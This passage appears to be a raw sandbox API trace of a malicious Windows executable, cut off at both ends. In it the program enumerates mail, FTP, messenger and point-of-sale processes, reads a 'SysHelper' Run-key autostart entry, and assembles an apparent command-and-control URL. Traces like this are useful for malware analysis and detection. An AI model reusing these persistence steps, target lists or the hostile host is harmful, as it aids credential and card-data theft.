(hObject=0x5a4) returned 1 [0104.751] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x35c) returned 0x5a4 [0104.751] EnumProcessModules (in: hProcess=0x5a4, lphModule=0x18e2ec, cb=0x4, lpcbNeeded=0x18e2d0 | out: lphModule=0x18e2ec, lpcbNeeded=0x18e2d0) returned 1 [0104.752] GetModuleBaseNameW (in: hProcess=0x5a4, hModule=0x8c0000, lpBaseName=0x18dad0, nSize=0x400 | out: lpBaseName="ncftp.exe") returned 0x9 [0104.752] CloseHandle (hObject=0x5a4) returned 1 [0104.752] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x7d0) returned 0x5a4 [0104.752] EnumProcessModules (in: hProcess=0x5a4, lphModule=0x18e2ec, cb=0x4, lpcbNeeded=0x18e2d0 | out: lphModule=0x18e2ec, lpcbNeeded=0x18e2d0) returned 1 [0104.753] GetModuleBaseNameW (in: hProcess=0x5a4, hModule=0xfd0000, lpBaseName=0x18dad0, nSize=0x400 | out: lpBaseName="notepad.exe") returned 0xb [0104.753] CloseHandle (hObject=0x5a4) returned 1 [0104.753] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x804) returned 0x5a4 [0104.753] EnumProcessModules (in: hProcess=0x5a4, lphModule=0x18e2ec, cb=0x4, lpcbNeeded=0x18e2d0 | out: lphModule=0x18e2ec, lpcbNeeded=0x18e2d0) returned 1 [0104.754] GetModuleBaseNameW (in: hProcess=0x5a4, hModule=0x9d0000, lpBaseName=0x18dad0, nSize=0x400 | out: lpBaseName="operamail.exe") returned 0xd [0104.755] CloseHandle (hObject=0x5a4) returned 1 [0104.755] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x814) returned 0x5a4 [0104.755] EnumProcessModules (in: hProcess=0x5a4, lphModule=0x18e2ec, cb=0x4, lpcbNeeded=0x18e2d0 | out: lphModule=0x18e2ec, lpcbNeeded=0x18e2d0) returned 1 [0104.756] GetModuleBaseNameW (in: hProcess=0x5a4, hModule=0x1210000, lpBaseName=0x18dad0, nSize=0x400 | out: lpBaseName="outlook.exe") returned 0xb [0104.756] CloseHandle (hObject=0x5a4) returned 1 [0104.756] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x824) returned 0x5a4 [0104.756] EnumProcessModules (in: hProcess=0x5a4, lphModule=0x18e2ec, cb=0x4, lpcbNeeded=0x18e2d0 | out: lphModule=0x18e2ec, lpcbNeeded=0x18e2d0) returned 1 [0104.757] GetModuleBaseNameW (in: hProcess=0x5a4, hModule=0xa80000, lpBaseName=0x18dad0, nSize=0x400 | out: lpBaseName="pidgin.exe") returned 0xa [0104.757] CloseHandle (hObject=0x5a4) returned 1 [0104.757] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x834) returned 0x5a4 [0104.757] EnumProcessModules (in: hProcess=0x5a4, lphModule=0x18e2ec, cb=0x4, lpcbNeeded=0x18e2d0 | out: lphModule=0x18e2ec, lpcbNeeded=0x18e2d0) returned 1 [0104.758] GetModuleBaseNameW (in: hProcess=0x5a4, hModule=0xda0000, lpBaseName=0x18dad0, nSize=0x400 | out: lpBaseName="scriptftp.exe") returned 0xd [0104.759] CloseHandle (hObject=0x5a4) returned 1 [0104.759] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x844) returned 0x5a4 [0104.759] EnumProcessModules (in: hProcess=0x5a4, lphModule=0x18e2ec, cb=0x4, lpcbNeeded=0x18e2d0 | out: lphModule=0x18e2ec, lpcbNeeded=0x18e2d0) returned 1 [0104.760] GetModuleBaseNameW (in: hProcess=0x5a4, hModule=0x11d0000, lpBaseName=0x18dad0, nSize=0x400 | out: lpBaseName="skype.exe") returned 0x9 [0104.760] CloseHandle (hObject=0x5a4) returned 1 [0104.760] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x854) returned 0x5a4 [0104.760] EnumProcessModules (in: hProcess=0x5a4, lphModule=0x18e2ec, cb=0x4, lpcbNeeded=0x18e2d0 | out: lphModule=0x18e2ec, lpcbNeeded=0x18e2d0) returned 1 [0104.761] GetModuleBaseNameW (in: hProcess=0x5a4, hModule=0x1220000, lpBaseName=0x18dad0, nSize=0x400 | out: lpBaseName="smartftp.exe") returned 0xc [0104.761] CloseHandle (hObject=0x5a4) returned 1 [0104.761] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x864) returned 0x5a4 [0104.761] EnumProcessModules (in: hProcess=0x5a4, lphModule=0x18e2ec, cb=0x4, lpcbNeeded=0x18e2d0 | out: lphModule=0x18e2ec, lpcbNeeded=0x18e2d0) returned 1 [0104.762] GetModuleBaseNameW (in: hProcess=0x5a4, hModule=0xee0000, lpBaseName=0x18dad0, nSize=0x400 | out: lpBaseName="thunderbird.exe") returned 0xf [0104.762] CloseHandle (hObject=0x5a4) returned 1 [0104.762] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x874) returned 0x5a4 [0104.763] EnumProcessModules (in: hProcess=0x5a4, lphModule=0x18e2ec, cb=0x4, lpcbNeeded=0x18e2d0 | out: lphModule=0x18e2ec, lpcbNeeded=0x18e2d0) returned 1 [0104.764] GetModuleBaseNameW (in: hProcess=0x5a4, hModule=0xe30000, lpBaseName=0x18dad0, nSize=0x400 | out: lpBaseName="totalcmd.exe") returned 0xc [0104.764] CloseHandle (hObject=0x5a4) returned 1 [0104.764] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x884) returned 0x5a4 [0104.764] EnumProcessModules (in: hProcess=0x5a4, lphModule=0x18e2ec, cb=0x4, lpcbNeeded=0x18e2d0 | out: lphModule=0x18e2ec, lpcbNeeded=0x18e2d0) returned 1 [0104.765] GetModuleBaseNameW (in: hProcess=0x5a4, hModule=0xb10000, lpBaseName=0x18dad0, nSize=0x400 | out: lpBaseName="trillian.exe") returned 0xc [0104.765] CloseHandle (hObject=0x5a4) returned 1 [0104.765] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x894) returned 0x5a4 [0104.765] EnumProcessModules (in: hProcess=0x5a4, lphModule=0x18e2ec, cb=0x4, lpcbNeeded=0x18e2d0 | out: lphModule=0x18e2ec, lpcbNeeded=0x18e2d0) returned 1 [0104.766] GetModuleBaseNameW (in: hProcess=0x5a4, hModule=0xb0000, lpBaseName=0x18dad0, nSize=0x400 | out: lpBaseName="webdrive.exe") returned 0xc [0104.766] CloseHandle (hObject=0x5a4) returned 1 [0104.766] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x8a4) returned 0x5a4 [0104.766] EnumProcessModules (in: hProcess=0x5a4, lphModule=0x18e2ec, cb=0x4, lpcbNeeded=0x18e2d0 | out: lphModule=0x18e2ec, lpcbNeeded=0x18e2d0) returned 1 [0104.768] GetModuleBaseNameW (in: hProcess=0x5a4, hModule=0xe70000, lpBaseName=0x18dad0, nSize=0x400 | out: lpBaseName="whatsapp.exe") returned 0xc [0104.768] CloseHandle (hObject=0x5a4) returned 1 [0104.768] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x8b4) returned 0x5a4 [0104.768] EnumProcessModules (in: hProcess=0x5a4, lphModule=0x18e2ec, cb=0x4, lpcbNeeded=0x18e2d0 | out: lphModule=0x18e2ec, lpcbNeeded=0x18e2d0) returned 1 [0104.769] GetModuleBaseNameW (in: hProcess=0x5a4, hModule=0xd40000, lpBaseName=0x18dad0, nSize=0x400 | out: lpBaseName="winscp.exe") returned 0xa [0104.769] CloseHandle (hObject=0x5a4) returned 1 [0104.769] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x8c4) returned 0x5a4 [0104.769] EnumProcessModules (in: hProcess=0x5a4, lphModule=0x18e2ec, cb=0x4, lpcbNeeded=0x18e2d0 | out: lphModule=0x18e2ec, lpcbNeeded=0x18e2d0) returned 1 [0104.770] GetModuleBaseNameW (in: hProcess=0x5a4, hModule=0x1120000, lpBaseName=0x18dad0, nSize=0x400 | out: lpBaseName="yahoomessenger.exe") returned 0x12 [0104.770] CloseHandle (hObject=0x5a4) returned 1 [0104.771] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x8d4) returned 0x5a4 [0104.771] EnumProcessModules (in: hProcess=0x5a4, lphModule=0x18e2ec, cb=0x4, lpcbNeeded=0x18e2d0 | out: lphModule=0x18e2ec, lpcbNeeded=0x18e2d0) returned 1 [0104.772] GetModuleBaseNameW (in: hProcess=0x5a4, hModule=0xd50000, lpBaseName=0x18dad0, nSize=0x400 | out: lpBaseName="active-charge.exe") returned 0x11 [0104.772] CloseHandle (hObject=0x5a4) returned 1 [0104.772] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x8e4) returned 0x5a4 [0104.772] EnumProcessModules (in: hProcess=0x5a4, lphModule=0x18e2ec, cb=0x4, lpcbNeeded=0x18e2d0 | out: lphModule=0x18e2ec, lpcbNeeded=0x18e2d0) returned 1 [0104.773] GetModuleBaseNameW (in: hProcess=0x5a4, hModule=0x140000, lpBaseName=0x18dad0, nSize=0x400 | out: lpBaseName="accupos.exe") returned 0xb [0104.773] CloseHandle (hObject=0x5a4) returned 1 [0104.773] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x8f4) returned 0x5a4 [0104.773] EnumProcessModules (in: hProcess=0x5a4, lphModule=0x18e2ec, cb=0x4, lpcbNeeded=0x18e2d0 | out: lphModule=0x18e2ec, lpcbNeeded=0x18e2d0) returned 1 [0104.774] GetModuleBaseNameW (in: hProcess=0x5a4, hModule=0x270000, lpBaseName=0x18dad0, nSize=0x400 | out: lpBaseName="afr38.exe") returned 0x9 [0104.775] CloseHandle (hObject=0x5a4) returned 1 [0104.775] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x904) returned 0x5a4 [0104.775] EnumProcessModules (in: hProcess=0x5a4, lphModule=0x18e2ec, cb=0x4, lpcbNeeded=0x18e2d0 | out: lphModule=0x18e2ec, lpcbNeeded=0x18e2d0) returned 1 [0104.776] GetModuleBaseNameW (in: hProcess=0x5a4, hModule=0xaf0000, lpBaseName=0x18dad0, nSize=0x400 | out: lpBaseName="aldelo.exe") returned 0xa [0104.776] CloseHandle (hObject=0x5a4) returned 1 [0104.776] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x914) returned 0x5a4 [0104.776] EnumProcessModules (in: hProcess=0x5a4, lphModule=0x18e2ec, cb=0x4, lpcbNeeded=0x18e2d0 | out: lphModule=0x18e2ec, lpcbNeeded=0x18e2d0) returned 1 [0104.778] GetModuleBaseNameW (in: hProcess=0x5a4, hModule=0x100000, lpBaseName=0x18dad0, nSize=0x400 | out: lpBaseName="ccv_server.exe") returned 0xe [0104.778] CloseHandle (hObject=0x5a4) returned 1 [0104.778] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x924) returned 0x5a4 [0104.778] EnumProcessModules (in: hProcess=0x5a4, lphModule=0x18e2ec, cb=0x4, lpcbNeeded=0x18e2d0 | out: lphModule=0x18e2ec, lpcbNeeded=0x18e2d0) returned 1 [0104.780] GetModuleBaseNameW (in: hProcess=0x5a4, hModule=0xce0000, lpBaseName=0x18dad0, nSize=0x400 | out: lpBaseName="centralcreditcard.exe") returned 0x15 [0104.780] CloseHandle (hObject=0x5a4) returned 1 [0104.780] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x934) returned 0x5a4 [0104.780] EnumProcessModules (in: hProcess=0x5a4, lphModule=0x18e2ec, cb=0x4, lpcbNeeded=0x18e2d0 | out: lphModule=0x18e2ec, lpcbNeeded=0x18e2d0) returned 1 [0104.781] GetModuleBaseNameW (in: hProcess=0x5a4, hModule=0x1f0000, lpBaseName=0x18dad0, nSize=0x400 | out: lpBaseName="creditservice.exe") returned 0x11 [0104.781] CloseHandle (hObject=0x5a4) returned 1 [0104.781] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x944) returned 0x5a4 [0104.781] EnumProcessModules (in: hProcess=0x5a4, lphModule=0x18e2ec, cb=0x4, lpcbNeeded=0x18e2d0 | out: lphModule=0x18e2ec, lpcbNeeded=0x18e2d0) returned 1 [0104.782] GetModuleBaseNameW (in: hProcess=0x5a4, hModule=0x270000, lpBaseName=0x18dad0, nSize=0x400 | out: lpBaseName="edcsvr.exe") returned 0xa [0104.783] CloseHandle (hObject=0x5a4) returned 1 [0104.783] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x954) returned 0x5a4 [0104.783] EnumProcessModules (in: hProcess=0x5a4, lphModule=0x18e2ec, cb=0x4, lpcbNeeded=0x18e2d0 | out: lphModule=0x18e2ec, lpcbNeeded=0x18e2d0) returned 1 [0104.784] GetModuleBaseNameW (in: hProcess=0x5a4, hModule=0x140000, lpBaseName=0x18dad0, nSize=0x400 | out: lpBaseName="fpos.exe") returned 0x8 [0104.784] CloseHandle (hObject=0x5a4) returned 1 [0104.784] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x964) returned 0x5a4 [0104.784] EnumProcessModules (in: hProcess=0x5a4, lphModule=0x18e2ec, cb=0x4, lpcbNeeded=0x18e2d0 | out: lphModule=0x18e2ec, lpcbNeeded=0x18e2d0) returned 1 [0104.785] GetModuleBaseNameW (in: hProcess=0x5a4, hModule=0x2a0000, lpBaseName=0x18dad0, nSize=0x400 | out: lpBaseName="isspos.exe") returned 0xa [0104.785] CloseHandle (hObject=0x5a4) returned 1 [0104.786] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x974) returned 0x5a4 [0104.786] EnumProcessModules (in: hProcess=0x5a4, lphModule=0x18e2ec, cb=0x4, lpcbNeeded=0x18e2d0 | out: lphModule=0x18e2ec, lpcbNeeded=0x18e2d0) returned 1 [0104.787] GetModuleBaseNameW (in: hProcess=0x5a4, hModule=0x390000, lpBaseName=0x18dad0, nSize=0x400 | out: lpBaseName="mxslipstream.exe") returned 0x10 [0104.787] CloseHandle (hObject=0x5a4) returned 1 [0104.787] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x984) returned 0x5a4 [0104.787] EnumProcessModules (in: hProcess=0x5a4, lphModule=0x18e2ec, cb=0x4, lpcbNeeded=0x18e2d0 | out: lphModule=0x18e2ec, lpcbNeeded=0x18e2d0) returned 1 [0104.788] GetModuleBaseNameW (in: hProcess=0x5a4, hModule=0x8e0000, lpBaseName=0x18dad0, nSize=0x400 | out: lpBaseName="omnipos.exe") returned 0xb [0104.788] CloseHandle (hObject=0x5a4) returned 1 [0104.788] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x994) returned 0x5a4 [0104.788] EnumProcessModules (in: hProcess=0x5a4, lphModule=0x18e2ec, cb=0x4, lpcbNeeded=0x18e2d0 | out: lphModule=0x18e2ec, lpcbNeeded=0x18e2d0) returned 1 [0104.789] GetModuleBaseNameW (in: hProcess=0x5a4, hModule=0xe60000, lpBaseName=0x18dad0, nSize=0x400 | out: lpBaseName="spcwin.exe") returned 0xa [0104.790] CloseHandle (hObject=0x5a4) returned 1 [0104.790] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x9a4) returned 0x5a4 [0104.790] EnumProcessModules (in: hProcess=0x5a4, lphModule=0x18e2ec, cb=0x4, lpcbNeeded=0x18e2d0 | out: lphModule=0x18e2ec, lpcbNeeded=0x18e2d0) returned 1 [0104.791] GetModuleBaseNameW (in: hProcess=0x5a4, hModule=0xea0000, lpBaseName=0x18dad0, nSize=0x400 | out: lpBaseName="spgagentservice.exe") returned 0x13 [0104.791] CloseHandle (hObject=0x5a4) returned 1 [0104.791] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x9b4) returned 0x5a4 [0104.791] EnumProcessModules (in: hProcess=0x5a4, lphModule=0x18e2ec, cb=0x4, lpcbNeeded=0x18e2d0 | out: lphModule=0x18e2ec, lpcbNeeded=0x18e2d0) returned 1 [0104.792] GetModuleBaseNameW (in: hProcess=0x5a4, hModule=0x230000, lpBaseName=0x18dad0, nSize=0x400 | out: lpBaseName="utg2.exe") returned 0x8 [0104.792] CloseHandle (hObject=0x5a4) returned 1 [0104.792] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x9c4) returned 0x5a4 [0104.792] EnumProcessModules (in: hProcess=0x5a4, lphModule=0x18e2ec, cb=0x4, lpcbNeeded=0x18e2d0 | out: lphModule=0x18e2ec, lpcbNeeded=0x18e2d0) returned 1 [0104.793] GetModuleBaseNameW (in: hProcess=0x5a4, hModule=0xe30000, lpBaseName=0x18dad0, nSize=0x400 | out: lpBaseName="driven.exe") returned 0xa [0104.794] CloseHandle (hObject=0x5a4) returned 1 [0104.794] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x9d4) returned 0x5a4 [0104.794] EnumProcessModules (in: hProcess=0x5a4, lphModule=0x18e2ec, cb=0x4, lpcbNeeded=0x18e2d0 | out: lphModule=0x18e2ec, lpcbNeeded=0x18e2d0) returned 1 [0104.795] GetModuleBaseNameW (in: hProcess=0x5a4, hModule=0x1230000, lpBaseName=0x18dad0, nSize=0x400 | out: lpBaseName="bulgarian-competitions.exe") returned 0x1a [0104.795] CloseHandle (hObject=0x5a4) returned 1 [0104.795] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x9e4) returned 0x5a4 [0104.795] EnumProcessModules (in: hProcess=0x5a4, lphModule=0x18e2ec, cb=0x4, lpcbNeeded=0x18e2d0 | out: lphModule=0x18e2ec, lpcbNeeded=0x18e2d0) returned 1 [0104.796] GetModuleBaseNameW (in: hProcess=0x5a4, hModule=0xa40000, lpBaseName=0x18dad0, nSize=0x400 | out: lpBaseName="occurred folk.exe") returned 0x11 [0104.796] CloseHandle (hObject=0x5a4) returned 1 [0104.796] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x9f4) returned 0x5a4 [0104.797] EnumProcessModules (in: hProcess=0x5a4, lphModule=0x18e2ec, cb=0x4, lpcbNeeded=0x18e2d0 | out: lphModule=0x18e2ec, lpcbNeeded=0x18e2d0) returned 1 [0104.798] GetModuleBaseNameW (in: hProcess=0x5a4, hModule=0x1090000, lpBaseName=0x18dad0, nSize=0x400 | out: lpBaseName="refuse lodging.exe") returned 0x12 [0104.798] CloseHandle (hObject=0x5a4) returned 1 [0104.798] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0xa24) returned 0x0 [0104.798] CloseHandle (hObject=0x0) returned 0 [0104.798] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0xa54) returned 0x0 [0104.798] CloseHandle (hObject=0x0) returned 0 [0104.798] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0xb78) returned 0x0 [0104.798] CloseHandle (hObject=0x0) returned 0 [0104.798] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x114) returned 0x0 [0104.798] CloseHandle (hObject=0x0) returned 0 [0104.798] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x6a8) returned 0x0 [0104.798] CloseHandle (hObject=0x0) returned 0 [0104.798] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x8dc) returned 0x0 [0104.798] CloseHandle (hObject=0x0) returned 0 [0104.798] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x95c) returned 0x0 [0104.798] CloseHandle (hObject=0x0) returned 0 [0104.798] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0xae4) returned 0x5a4 [0104.799] EnumProcessModules (in: hProcess=0x5a4, lphModule=0x18e2ec, cb=0x4, lpcbNeeded=0x18e2d0 | out: lphModule=0x18e2ec, lpcbNeeded=0x18e2d0) returned 0 [0104.799] CloseHandle (hObject=0x5a4) returned 1 [0104.799] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0xbbc) returned 0x5a4 [0104.799] EnumProcessModules (in: hProcess=0x5a4, lphModule=0x18e2ec, cb=0x4, lpcbNeeded=0x18e2d0 | out: lphModule=0x18e2ec, lpcbNeeded=0x18e2d0) returned 1 [0104.800] GetModuleBaseNameW (in: hProcess=0x5a4, hModule=0x400000, lpBaseName=0x18dad0, nSize=0x400 | out: lpBaseName="CUsersGrujaAppDataLocalf8dae1c3-7a0a-4e72-953d-2c2978522d0b09b4b7b46aaa241b8e31419b9d71e0b9b1c70991cb1dd544cfb55150ebcb7a72.exe") returned 0x7f [0104.800] CloseHandle (hObject=0x5a4) returned 1 [0104.806] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x0, Size=0x28) returned 0x6da340 [0104.806] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x0, Size=0x25c) returned 0x32508c0 [0104.806] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x0, Size=0x25c) returned 0x3250b28 [0104.806] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x0, Size=0x25c) returned 0x3250d90 [0104.806] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x0, Size=0x25c) returned 0x3250ff8 [0104.806] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x0, Size=0x25c) returned 0x3251260 [0104.806] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x0, Size=0x25c) returned 0x32514c8 [0104.806] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x0, Size=0x25c) returned 0x3251730 [0104.806] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x0, Size=0x25c) returned 0x3251998 [0104.806] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x0, Size=0x25c) returned 0x3251c00 [0104.806] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x0, Size=0x25c) returned 0x3251e68 [0104.812] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\Run", ulOptions=0x0, samDesired=0xf003f, phkResult=0x18e2d0 | out: phkResult=0x18e2d0*=0x5a4) returned 0x0 [0104.812] RegQueryValueExW (in: hKey=0x5a4, lpValueName="SysHelper", lpReserved=0x0, lpType=0x18e2cc, lpData=0x18c9f8, lpcbData=0x18e2b0*=0x400 | out: lpType=0x18e2cc*=0x2, lpData="\"C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\3af89e63-1a12-46ae-ba57-0b2d2fa1411a\\CUsersGrujaAppDataLocalf8dae1c3-7a0a-4e72-953d-2c2978522d0b09b4b7b46aaa241b8e31419b9d71e0b9b1c70991cb1dd544cfb55150ebcb7a72.exe\" --AutoStart", lpcbData=0x18e2b0*=0x1be) returned 0x0 [0104.812] RegCloseKey (hKey=0x5a4) returned 0x0 [0104.813] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x0, Size=0x1c0) returned 0x32520d0 [0104.813] lstrlenA (lpString="\" --AutoStart") returned 13 [0104.813] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x0, Size=0x1b0) returned 0x3252298 [0104.813] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x32520d0 | out: hHeap=0x6b0000) returned 1 [0104.813] PathFileExistsW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\3af89e63-1a12-46ae-ba57-0b2d2fa1411a\\CUsersGrujaAppDataLocalf8dae1c3-7a0a-4e72-953d-2c2978522d0b09b4b7b46aaa241b8e31419b9d71e0b9b1c70991cb1dd544cfb55150ebcb7a72.exe") returned 1 [0104.813] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x0, Size=0x1b0) returned 0x32520d0 [0104.813] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x3252298 | out: hHeap=0x6b0000) returned 1 [0104.813] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x0, Size=0x28) returned 0x6da670 [0104.813] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x0, Size=0x25c) returned 0x3252288 [0104.813] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x0, Size=0x25c) returned 0x32524f0 [0104.813] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x0, Size=0x25c) returned 0x3252758 [0104.813] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x0, Size=0x25c) returned 0x32529c0 [0104.813] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x0, Size=0x25c) returned 0x3252c28 [0104.813] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x0, Size=0x25c) returned 0x3252e90 [0104.813] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x0, Size=0x25c) returned 0x3237da8 [0104.813] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x0, Size=0x25c) returned 0x3238010 [0104.813] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x0, Size=0x25c) returned 0x3238278 [0104.813] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x0, Size=0x25c) returned 0x32384e0 [0104.813] lstrlenA (lpString="http://budf.top/ydtftysdtyftysdfsdpen3/get.php") returned 46 [0104.813] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x0, Size=0x5e) returned 0x78f4d8 [0104.813] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3252288, cbMultiByte=-1, lpWideCharStr=0x78f4d8, cchWideChar=47 | out: lpWideCharStr="http://budf.top/ydtftysdtyftysdfsdpen3/get.php") returned 47 [0104.813] lstrcatW (in: lpString1="", lpString2="http://budf.top/ydtftysdtyftysdfsdpen3/get.php" | out: lpString1="http://budf.top/ydtftysdtyftysdfsdpen3/get.php") returned="http://budf.top/ydtftysdtyftysdfsdpen3/get.php" [0104.813] lstrlenA (lpString="") returned 0 [0104.813] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x0, Size=0x2) returned 0x31e31a8 [0104.813] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x32524f0, cbMultiByte=-1, lpWideCharStr=0x31e31a8, cchWideChar=1 | out: lpWideCharStr="") returned 1 [0104.814] lstrcatW (in: lpString1="http://budf.top/ydtftysdtyftysdfsdpen3/get.php", lpString2="" | out: lpString1="http://budf.top/ydtftysdtyftysdfsdpen3/get.php") returned="http://budf.top/ydtftysdtyftysdfsdpen3/get.php" [0104.814] lstrlenA (lpString="") returned 0 [0104.814] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x0, Size=0x2) returned 0x31e31c8 [0104.814] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3252758, cbMultiByte=-1, lpWideCharStr=0x31e31c8, cchWideChar=1 | out: lpWideCharStr="") returned 1 [0104.814] lstrcatW (in: lpString1="http://budf.top/ydtftysdtyftysdfsdpen3/get.php", lpString2="" | out: lpString1="http://budf.top/ydtftysdtyftysdfsdpen3/get.php") returned="http://budf.top/ydtftysdtyftysdfsdpen3/get.php" [0104.814] lstrlenA (lpString="") returned 0 [0104.814] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x0, Size=0x2) returned 0x31e3198 [0104.814] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x32529c0, cbMultiByte=-1, lpWideCharStr=0x31e3198, cchWideChar=1 | out: lpWideCharStr="") returned 1 [0104.814] lstrcatW (in: lpString1="http://budf.top/ydtftysdtyftysdfsdpen3/get.php", lpString2="" | out: lpString1="http://budf.top/ydtftysdtyftysdfsdpen3/get.php") returned="http://budf.top/ydtftysdtyftysdfsdpen3/get.php" [0104.814] lstrlenA (lpString="") returned 0 [0104.814] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x0, Size=0x2) returned 0x31e3238 [0104.814] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3252c28, cbMultiByte=-1, lpWideCharStr=0x31e3238, cchWideChar=1 | out: lpWideCharStr="") returned 1 [0104.814] lstrcatW (in: lpString1="http://budf.top/ydtftysdtyftysdfsdpen3/get.php", lpString2="" | out: lpString1="http://budf.top/ydtftysdtyftysdfsdpen3/get.php") returned="http://budf.top/ydtftysdtyftysdfsdpen3/get.php" [0104.814] lstrlenA (lpString="") returned 0 [0104.814] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x0, Size=0x2) returned 0x31e31b8 [0104.814] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3252e90, cbMultiByte=-1, lpWideCharStr=0x31e31b8, cchWideChar=1 | out: lpWideCharStr="") returned 1 [0104.815] lstrcatW (in: lpString1="http://budf.top/ydtftysdtyftysdfsdpen3/get.php", lpString2="" | out: lpString1="http://budf.top/ydtftysdtyftysdfsdpen3/get.php") returned="http://budf.top/ydtftysdtyftysdfsdpen3/get.php" [0104.815] lstrlenA (lpString="") returned 0 [0104.815] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x0, Size=0x2) returned 0x31e31e8 [0104.815] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3237da8, cbMultiByte=-1, lpWideCharStr=0x31e31e8, cchWideChar=1 | out: lpWideCharStr="") returned 1 [0104.815] lstrcatW (in: lpString1="http://budf.top/ydtftysdtyftysdfsdpen3/get.php", lpString2="" | out: 